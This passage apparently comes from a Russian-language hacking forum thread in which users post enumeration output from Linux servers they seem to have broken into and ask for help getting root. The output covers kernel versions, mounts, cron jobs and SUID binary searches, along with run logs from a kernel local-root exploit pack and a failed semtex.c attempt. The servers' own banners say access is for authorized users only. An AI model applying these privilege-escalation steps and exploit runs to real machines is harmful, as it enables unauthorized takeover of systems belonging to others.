01:10:52.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so -r--r--r-- 1 root root 64678 2014-11-18 13:10:58.000000000 +0300 libdevmapper-event.a lrwxrwxrwx 1 root root 26 2014-11-19 01:08:46.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02 -r-xr-xr-x 1 root root 21856 2014-11-18 13:11:03.000000000 +0300 libdevmapper-event.so.1.02 -r--r--r-- 1 root root 717500 2014-11-18 13:10:52.000000000 +0300 libdevmapper.a lrwxrwxrwx 1 root root 20 2014-11-19 01:08:46.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02 -r-xr-xr-x 1 root root 154640 2014-11-18 13:11:03.000000000 +0300 libdevmapper.so.1.02 -rwxr-xr-x 1 root root 23360 2015-01-27 20:33:49.000000000 +0300 libdl-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:22.000000000 +0300 libdl.so.2 -> libdl-2.5.so lrwxrwxrwx 1 root root 34 2011-09-15 
01:15:02.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13 -rwxr-xr-x 1 root root 22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13 -r-xr-xr-x 1 root root 22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17 lrwxrwxrwx 1 root root 23 2011-09-15 01:15:02.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13 -rwxr-xr-x 1 root root 212736 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13 -r-xr-xr-x 1 root root 215256 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13-17 lrwxrwxrwx 1 root root 13 2014-10-01 01:10:44.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3 -rwxr-xr-x 1 root root 26424 2014-09-18 14:12:06.000000000 +0400 libe2p.so.2.3 lrwxrwxrwx 1 root root 17 2012-06-14 01:12:05.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0 -rwxr-xr-x 1 root root 144344 2012-06-13 18:35:35.000000000 +0400 libexpat.so.0.5.0 lrwxrwxrwx 1 root root 16 2014-10-01 01:10:44.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4 -rwxr-xr-x 1 root root 122296 2014-09-18 14:12:06.000000000 +0400 libext2fs.so.2.4 -rwxr-xr-x 1 root root 58400 2014-09-18 05:58:04.000000000 +0400 libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 28 2014-10-01 01:10:09.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 23 2009-09-29 10:33:39.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 647608 2009-03-25 04:47:43.000000000 +0300 libglib-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 13520 2009-03-25 04:47:43.000000000 +0300 libgmodule-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 262904 2009-03-25 04:47:43.000000000 +0300 libgobject-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgthread-2.0.so.0 -> 
libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 19176 2009-03-25 04:47:43.000000000 +0300 libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 31576 2007-03-15 06:16:08.000000000 +0300 libiw.so.28 -rwxr-xr-x 1 root root 9472 2007-01-06 10:55:38.000000000 +0300 libkeyutils-1.2.so lrwxrwxrwx 1 root root 18 2009-09-29 10:33:39.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so -r--r--r-- 1 root root 5902120 2014-09-17 21:57:53.000000000 +0400 liblvm2cmd.a lrwxrwxrwx 1 root root 18 2014-10-01 01:10:52.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02 -r-xr-xr-x 1 root root 804632 2014-09-17 21:57:55.000000000 +0400 liblvm2cmd.so.2.02 -rwxr-xr-x 1 root root 614992 2015-01-27 20:33:49.000000000 +0300 libm-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:22.000000000 +0300 libm.so.6 -> libm-2.5.so -rwxr-xr-x 1 root root 114352 2015-01-27 20:33:49.000000000 +0300 libnsl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:22.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so -rwxr-xr-x 1 root root 43128 2015-01-27 20:33:49.000000000 +0300 libnss_compat-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:22.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so -rwxr-xr-x 1 root root 799680 2015-01-05 13:12:31.000000000 +0300 libnss_db-2.2.so lrwxrwxrwx 1 root root 16 2015-01-06 01:08:40.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so -rwxr-xr-x 1 root root 23736 2015-01-27 20:33:49.000000000 +0300 libnss_dns-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so -rwxr-xr-x 1 root root 53880 2015-01-27 20:33:49.000000000 +0300 libnss_files-2.5.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:22.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so -rwxr-xr-x 1 root root 24736 2015-01-27 20:33:49.000000000 +0300 libnss_hesiod-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:22.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so -rwxr-xr-x 1 root root 3185264 2015-06-15 15:38:14.000000000 +0300 libnss_ldap-2.5.so 
lrwxrwxrwx 1 root root 18 2015-06-16 01:09:08.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so -rwxr-xr-x 1 root root 53544 2015-01-27 20:33:49.000000000 +0300 libnss_nis-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so -rwxr-xr-x 1 root root 62944 2015-01-27 20:33:49.000000000 +0300 libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 21 2015-01-28 18:11:22.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 16 2015-05-28 01:08:58.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5 -rwxr-xr-x 1 root root 46800 2015-05-27 16:48:51.000000000 +0300 libpam.so.0.81.5 lrwxrwxrwx 1 root root 21 2015-05-28 01:08:58.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2 -rwxr-xr-x 1 root root 13456 2015-05-27 16:48:51.000000000 +0300 libpam_misc.so.0.81.2 lrwxrwxrwx 1 root root 17 2015-05-28 01:08:58.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0 -rwxr-xr-x 1 root root 11264 2015-05-27 16:48:51.000000000 +0300 libpamc.so.0.81.0 lrwxrwxrwx 1 root root 16 2013-10-20 01:10:04.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1 -rwxr-xr-x 1 root root 129984 2013-10-01 22:15:48.000000000 +0400 libpcre.so.0.0.1 -rwxr-xr-x 1 root root 61248 2013-10-02 00:37:04.000000000 +0400 libproc-3.2.7.so -rwxr-xr-x 1 root root 149968 2015-01-27 20:33:50.000000000 +0300 libpthread-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so -rwxr-xr-x 1 root root 92816 2015-01-27 20:33:50.000000000 +0300 libresolv-2.5.so lrwxrwxrwx 1 root root 16 2015-01-28 18:11:22.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so -rwxr-xr-x 1 root root 53448 2015-01-27 20:33:50.000000000 +0300 librt-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:22.000000000 +0300 librt.so.1 -> librt-2.5.so -rwxr-xr-x 1 root root 95464 2011-03-06 07:48:31.000000000 +0300 libselinux.so.1 -rwxr-xr-x 1 root root 159592 2009-09-04 02:47:06.000000000 +0400 libsemanage.so.1 -rwxr-xr-x 1 root root 
247496 2010-03-31 12:17:32.000000000 +0400 libsepol.so.1 lrwxrwxrwx 1 root root 12 2014-10-01 01:10:44.000000000 +0400 libss.so.2 -> libss.so.2.0 -rwxr-xr-x 1 root root 26688 2014-09-18 14:12:06.000000000 +0400 libss.so.2.0 -rwxr-xr-x 1 root root 323528 2015-05-12 23:58:28.000000000 +0300 libssl.so.0.9.8e lrwxrwxrwx 1 root root 11 2009-09-29 10:33:39.000000000 +0400 libssl.so.4 -> libssl.so.6 lrwxrwxrwx 1 root root 16 2015-05-14 01:08:43.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e lrwxrwxrwx 1 root root 19 2009-09-29 10:33:39.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 15584 2007-01-06 19:58:47.000000000 +0300 libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 36200 2015-01-27 20:33:50.000000000 +0300 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:22.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 18152 2015-01-27 20:33:50.000000000 +0300 libutil-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:22.000000000 +0300 libutil.so.1 -> libutil-2.5.so lrwxrwxrwx 1 root root 14 2014-10-01 01:10:44.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2 -rwxr-xr-x 1 root root 17936 2014-09-18 14:12:06.000000000 +0400 libuuid.so.1.2 lrwxrwxrwx 1 root root 22 2014-10-01 01:11:15.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0 -rwxr-xr-x 1 root root 33792 2014-09-17 22:43:42.000000000 +0400 libvolume_id.so.0.66.0 lrwxrwxrwx 1 root root 16 2009-10-23 01:10:41.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6 -rwxr-xr-x 1 root root 37368 2009-09-22 02:29:33.000000000 +0400 libwrap.so.0.7.6 lrwxrwxrwx 1 root root 13 2013-01-18 01:13:05.000000000 +0400 libz.so -> libz.so.1.2.3 lrwxrwxrwx 1 root root 13 2013-01-18 01:11:17.000000000 +0400 libz.so.1 -> libz.so.1.2.3 -rwxr-xr-x 1 root root 85544 2012-07-17 12:32:04.000000000 +0400 libz.so.1.2.3 drwxr-xr-x 2 root root 4096 2015-01-28 18:11:22.000000000 +0300 rtkaio drwxr-xr-x 4 root root 4096 2015-06-16 01:09:08.000000000 +0300 security mount Code: 
/dev/sda5 on / type ext3 (rw,usrquota) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sda8 on /home type ext3 (rw,nosuid,noatime,usrquota,grpquota) /dev/sda3 on /usr type ext3 (rw,usrquota,grpquota) /dev/sda2 on /var type ext3 (rw,nosuid,usrquota,grpquota) /dev/sda1 on /boot type ext3 (rw) tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,nodev) none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1G,nr_inodes=256k) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /tmp on /tmp type none (rw,noexec,nosuid,bind) cat /etc/issue Code: This computer system is for authorized users only. Individuals using this system without authority or in excess of their authority are subject to having all their activities on this system monitored and recorded or examined by any authorized person, including law enforcement, as system personnel deem appropriate. In the course of monitoring individuals improperly using the system or in the course of system maintenance, the activities of authorized users may also be monitored and recorded. Any material so recorded may be disclosed as appropriate. Anyone using this system consents to these terms. 
cat /etc/crontab Code: SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # run-parts 01 * * * * root run-parts /etc/cron.hourly 02 4 * * * root run-parts /etc/cron.daily 22 4 * * 0 root run-parts /etc/cron.weekly 42 4 1 * * root run-parts /etc/cron.monthly ls -la /etc/cron.hourly Code: -rwxr-xr-x 1 root root 1683 Nov 21 2014 check_raid_status -rwxr-xr-x 1 root root 390 May 18 2011 mcelog.cron ls -la /etc/cron.daily Code: -rwxr-xr-x 1 root root 379 Mar 28 2007 0anacron lrwxrwxrwx 1 root root 39 Jan 18 2013 0logwatch -> /usr/share/logwatch/scripts/logwatch.pl -rwxr-xr-x 1 root root 118 Jan 20 20:14 cups -rwxr-xr-x 1 root root 219 Jun 6 2013 logrotate -rwxr-xr-x 1 root root 418 May 30 2012 makewhatis.cron -rwxr-xr-x 1 root root 137 Sep 3 2009 mlocate.cron -rwxr-xr-x 1 root root 2181 Jun 21 2006 prelink -rwxr-xr-x 1 root root 1746 May 14 2012 rkhunter -rwxr-xr-x 1 adegtyarev wheel 322 Sep 17 2013 rpaf_ips -rwxr-xr-x 1 root root 296 Dec 9 2014 rpm -rwxr-xr-x 1 root root 354 Aug 11 2010 tmpwatch ls -la /etc/cron.monthly Code: -rwxr-xr-x 1 root root 381 Mar 28 2007 0anacron ls -la /etc/cron.weekly Code: -rwxr-xr-x 1 root root 380 Mar 28 2007 0anacron -rwxr-xr-x 1 root root 2843 Jan 9 2013 99-raid-check -rwxr-xr-x 1 root root 414 May 30 2012 makewhatis.cron cat /proc/version Code: Linux version 2.6.18-400.1.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-55)) #1 SMP Thu Dec 18 00:59:53 EST 2014 cat /proc/sys/vm/mmap_min_addr Code: 4096 pwd ls -la /usr/bin/staprun find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null Code: -rwsr-x--- 1 root dbus 48152 Oct 2 2013 /lib64/dbus-1/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 61656 Nov 8 2012 /bin/mount -rwsr-x--- 1 root wheel 28336 Mar 21 2012 /bin/su -rwsr-xr-x 1 root root 41592 Nov 8 2012 /bin/umount -rwsr-xr-x 1 root root 2078708 Feb 22 2012 /opt/suphp/sbin/suphp -rwsr-xr-x 1 root root 19768 May 27 16:48 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 75504 May 6 12:41 
/sbin/umount.nfs4 -rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/umount.nfs -rwsr-xr-x 1 root root 75496 May 6 12:41 /sbin/mount.nfs -rwsr-x--- 1 root ecryptfs 19824 Feb 23 2012 /sbin/mount.ecryptfs_private -rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/mount.nfs4 -rwsr-xr-x 1 root root 14112 May 27 16:48 /sbin/pam_timestamp_check -rwsr-xr-x 1 root root 176616 Feb 22 2012 /usr/libexec/openssh/ssh-keysign -rwsr-xr-x 1 root root 1166176 Oct 25 2012 /usr/sbin/exim -rwsr-xr-x 1 root root 8848 Sep 22 2014 /usr/sbin/usernetctl -rwsr-xr-x 1 root root 200671 Sep 22 2014 /usr/kerberos/bin/ksu -rwsr-xr-x 1 root root 28584 Sep 17 2014 /usr/bin/newgrp -rwsr-xr-x 1 root root 120784 Oct 2 2009 /usr/bin/incrontab -rwsr-xr-x 1 root root 51752 Sep 17 2014 /usr/bin/gpasswd -rwsr-xr-x 1 root root 50696 Sep 17 2014 /usr/bin/chage -rwsr-sr-x 1 root root 315640 Feb 23 2012 /usr/bin/crontab ---s--x--x 2 root root 190912 Mar 10 2014 /usr/bin/sudoedit -rwsr-xr-x 1 root root 75264 Jan 9 2013 /usr/bin/quota -rwsr-xr-x 1 root root 15552 Nov 7 2011 /usr/bin/rlogin -rwsr-xr-x 1 root root 27936 Aug 11 2010 /usr/bin/passwd ---s--x--x 2 root root 190912 Mar 10 2014 /usr/bin/sudo -rwsr-xr-x 1 root root 20384 Nov 7 2011 /usr/bin/rcp -rwsr-xr-x 1 root root 49392 Oct 8 2014 /usr/bin/at -rws--x--x 1 root root 22200 Nov 8 2012 /usr/bin/chfn -rwsr-xr-x 1 root root 11328 Nov 7 2011 /usr/bin/rsh -rwsr-xr-x 1 root root 18606 Feb 22 2012 /usr/local/apache/bin/suexec -rwsr-xr-x 1 root root 18606 Feb 22 2012 /usr/local/apache.backup/bin/suexec
semtex.c не берет Code: $ uname -a Linux host.com 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux $ ls -la /boot total 49531 dr-xr-xr-x. 5 root root 1024 Jul 19 2013 . dr-xr-xr-x. 23 root root 4096 Jul 9 08:33 .. -rw-r--r--. 1 root root 171 Jul 17 2013 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac -rw-r--r--. 1 root root 166 Feb 22 2013 .vmlinuz-2.6.32-358.el6.x86_64.hmac -rw-r--r--. 1 root root 2408392 Jul 17 2013 System.map-2.6.32-358.14.1.el6.x86_64 -rw-r--r--. 1 root root 2407466 Feb 22 2013 System.map-2.6.32-358.el6.x86_64 -rw-r--r--. 1 root root 104086 Jul 17 2013 config-2.6.32-358.14.1.el6.x86_64 -rw-r--r--. 1 root root 104081 Feb 22 2013 config-2.6.32-358.el6.x86_64 drwxr-xr-x. 3 root root 1024 Jul 19 2013 efi drwxr-xr-x. 2 root root 1024 Oct 15 2014 grub -rw-r--r--. 1 root root 16210951 Jul 19 2013 initramfs-2.6.32-358.14.1.el6.x86_64.img -rw-r--r--. 1 root root 16206526 Jul 19 2013 initramfs-2.6.32-358.el6.x86_64.img -rw------- 1 root root 4563905 Apr 16 02:54 initrd-2.6.32-358.14.1.el6.x86_64kdump.img drwx------. 2 root root 12288 Jul 19 2013 lost+found -rw-r--r--. 1 root root 185902 Jul 17 2013 symvers-2.6.32-358.14.1.el6.x86_64.gz -rw-r--r--. 1 root root 185734 Feb 22 2013 symvers-2.6.32-358.el6.x86_64.gz -rwxr-xr-x. 1 root root 4045680 Jul 17 2013 vmlinuz-2.6.32-358.14.1.el6.x86_64 -rwxr-xr-x. 
1 root root 4043888 Feb 22 2013 vmlinuz-2.6.32-358.el6.x86_64 $ lls -la --full-time /lib $ lls -la --full-time /lib64 $ mount /dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/sda1 on /boot type ext2 (rw) /dev/sda4 on /tmp type ext4 (rw,noexec,nosuid,nodev) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /tmp on /var/tmp type none (rw,noexec,nosuid,bind) $ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda2 2.7T 631G 2.0T 25% / tmpfs 7.8G 0 7.8G 0% /dev/shm /dev/sda1 97M 51M 42M 55% /boot /dev/sda4 2.0G 84M 1.8G 5% /tmp $ cat /etc/issue This computer system is for authorized users only. Individuals using this system without authority or in excess of their authority are subject to having all their activities on this system monitored and recorded or examined by any authorized person, including law enforcement, as system personnel deem appropriate. In the course of monitoring individuals improperly using the system or in the course of system maintenance, the activities of authorized users may also be monitored and recorded. Any material so recorded may be disclosed as appropriate. Anyone using this system consents to these terms. $ cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... 
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed $ ls -la cron.d, $ ls -la cron.d $ ls -la cron.hourly $ ls -la cron.weekly $ cat /proc/version Linux version 2.6.32-358.14.1.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 23:51:20 UTC 2013 $ cat /proc/sys/vm/mmap_min_addr 4096 $ ls -la /usr/bin/staprun ---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null -rws--x--x 1 root root 14280 May 27 17:00 /usr/libexec/pt_chown -rwsr-xr-x 1 abrt abrt 10296 Oct 16 2014 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache -rwsr-xr-x 1 root root 257824 Nov 13 2014 /usr/libexec/openssh/ssh-keysign -rwsr-xr-x 1 root root 14368 Oct 15 2014 /usr/libexec/polkit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache/bin/suexec -rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache.backup/bin/suexec -rws--x--x 1 root root 20184 Oct 15 2014 /usr/bin/chfn -rwsr-xr-x 1 root root 66352 Apr 7 11:52 /usr/bin/chage -rwsr-xr-x 1 root root 82752 Mar 19 2014 /usr/bin/quota -rwsr-xr-x 1 root root 71480 Apr 7 11:52 /usr/bin/gpasswd -rwsr-xr-x 1 root root 54336 Oct 18 2014 /usr/bin/at -rwsr-xr-x 1 root root 22544 Oct 15 2014 /usr/bin/pkexec ---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun -rwsr-xr-x. 1 root root 30768 Feb 22 2012 /usr/bin/passwd -rwsr-xr-x 1 root root 36144 Apr 7 11:52 /usr/bin/newgrp -rwsr-xr-x 1 root root 51784 Nov 23 2013 /usr/bin/crontab Compiling exp_abacus.c...OK. Compiling exp_cheddarbay.c...OK. Compiling exp_ingom0wnar.c...OK. Compiling exp_moosecox.c...OK. Compiling exp_paokara.c...OK. Compiling exp_powerglove.c...OK. Compiling exp_sieve.c...OK. Compiling exp_therebel.c...OK. Compiling exp_vmware.c...failed. Compiling exp_wunderbar.c...OK. 
Choose your exploit: [0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method) [2] Sieve: Linux 2.6.18+ move_pages() infoleak [3] Exit > 0 ------------------------------------------------------------------------------ The limits of my language are the limits of my mind. All I know is what I have words for. --Wittgenstein ------------------------------------------------------------------------------ [+] Resolved set_fs_root to 0xffffffff811b3030 (via System.map) [+] Resolved set_fs_pwd to 0xffffffff811b2fc0 (via System.map) [+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map) [+] Resolved init_task to 0xffffffff81a8d020 (via System.map) [+] Resolved init_fs to 0xffffffff81ad4c40 (via System.map) [+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map) [+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map) [+] Resolved bad_file_aio_read to 0xffffffff8119e9e0 (via System.map) [+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map) [+] Resolved ima_file_mmap to 0xffffffff8123fa00 (via System.map) [+] Resolved ima_bprm_check to 0xffffffff8123f9c0 (via System.map) [+] Resolved ima_file_check to 0xffffffff8123f990 (via System.map) [+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map) [+] Resolved selinux_enabled to 0xffffffff81ae2880 (via System.map) [+] Resolved security_ops to 0xffffffff81fcec58 (via System.map) [+] Resolved default_security_ops to 0xffffffff81aded00 (via System.map) [+] Resolved sel_read_enforce to 0xffffffff8122c120 (via System.map) [+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map) [+] Resolved commit_creds to 0xffffffff8109e5c0 (via System.map) [+] Resolved prepare_kernel_cred to 0xffffffff8109e840 (via System.map) [+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map) [+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map) [+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via 
System.map) [+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map) [+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map) [+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map) [!] Securely probing with great effort [-] System rejected creation of perf event. Either this system is patched, or a previous failed exploit was run against it.
Помогите разобраться с сие машинкой: Spoiler: uname -a Code: Linux srv007 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux Spoiler: mount Code: /dev/sda2 on / type ext3 (rw,noatime,errors=remount-ro) tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) udev on /dev type tmpfs (rw,mode=0755) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620) /dev/sda1 on /boot type ext3 (rw,noatime) /dev/sda6 on /home type ext3 (rw,nosuid,nodev,noatime,usrquota) /dev/sda5 on /var type ext3 (rw,noatime) Spoiler: cat /etc/issue Code: Debian GNU/Linux 6.0 \n \l Spoiler: cat /etc/crontab Code: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # Spoiler: cat /proc/sys/vm/mmap_min_addr Code: 65536 Spoiler: ls -la /etc/cron.hourly Code: total 16 drwxr-xr-x 2 root root 4096 Dec 23 2014 . drwxr-xr-x 104 root root 4096 Jul 17 12:12 .. -rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder -rwx------ 1 root root 317 Dec 23 2014 nginx-log-rotate Spoiler: ls -la /etc/cron.monthly Code: total 20 drwxr-xr-x 2 root root 4096 Nov 14 2011 . drwxr-xr-x 104 root root 4096 Jul 17 12:12 .. 
-rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder -rwxr-xr-x 1 root root 1281 Sep 28 2010 acct -rwx------ 1 root root 270 Mar 1 2011 rm_old_cronjobs.sh Spoiler: ls -la /etc/cron.monthly Code: total 24 drwxr-xr-x 2 root root 4096 Nov 14 2011 . drwxr-xr-x 104 root root 4096 Jul 17 12:12 .. -rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder -rwxr-xr-x 1 root root 895 Jan 3 2011 man-db -rwxr-xr-x 1 root root 1784 Apr 6 2010 rkhunter -rwxr-xr-x 1 root root 1133 Sep 10 2010 sysklogd GCC присутствует, но права на него отсутствуют Пробовал использовать enlightenment из шапки, результат вот: Spoiler: ./run_null_exploits.sh Code: Compiling exp_abacus.c...OK. Compiling exp_cheddarbay.c...OK. Compiling exp_ingom0wnar.c...OK. Compiling exp_moosecox.c...OK. Compiling exp_paokara.c...OK. Compiling exp_powerglove.c...OK. Compiling exp_sieve.c...OK. Compiling exp_therebel.c...OK. Compiling exp_vmware.c...OK. Compiling exp_wunderbar.c...OK. ./run_null_exploits.sh: line 61: /usr/bin/gcc: Permission denied ./run_null_exploits.sh: line 63: ./pwnkernel: No such file or directory
Ну, спасайте, господа товарищи олдфаги. Code: uname -a : Linux admin-server 2.6.32-43-generic-pae #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 i686 GNU/Linux ls -la /boot : total 20016 drwxr-xr-x 3 root root 4096 Oct 9 2012 . drwxr-xr-x 22 root root 4096 Jul 18 15:20 .. -rw-r--r-- 1 root root 1735360 Sep 6 2012 System.map-2.6.32-43-generic-pae -rw-r--r-- 1 root root 656323 Sep 6 2012 abi-2.6.32-43-generic-pae -rw-r--r-- 1 root root 116469 Sep 6 2012 config-2.6.32-43-generic-pae drwxr-xr-x 3 root root 4096 Oct 8 2012 grub -rw-r--r-- 1 root root 13612578 Oct 9 2012 initrd.img-2.6.32-43-generic-pae -rw-r--r-- 1 root root 160280 Mar 23 2010 memtest86+.bin -rw-r--r-- 1 root root 1200 Sep 6 2012 vmcoreinfo-2.6.32-43-generic-pae -rw-r--r-- 1 root root 4183264 Sep 6 2012 vmlinuz-2.6.32-43-generic-pae lls -la --full-time /lib : (пусто) mount : /dev/sda1 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) none on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) none on /dev type devtmpfs (rw,mode=0755) none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) none on /dev/shm type tmpfs (rw,nosuid,nodev) none on /var/run type tmpfs (rw,nosuid,mode=0755) none on /var/lock type tmpfs (rw,noexec,nosuid,nodev) none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) gvfs-fuse-daemon on /home/administrator/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=administrator) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev) /dev/fuse on /tmp/exploit||/tmp/exploit type fuse (rw,nosuid,nodev,user=www-data) /dev/fuse on /tmp/_ type fuse 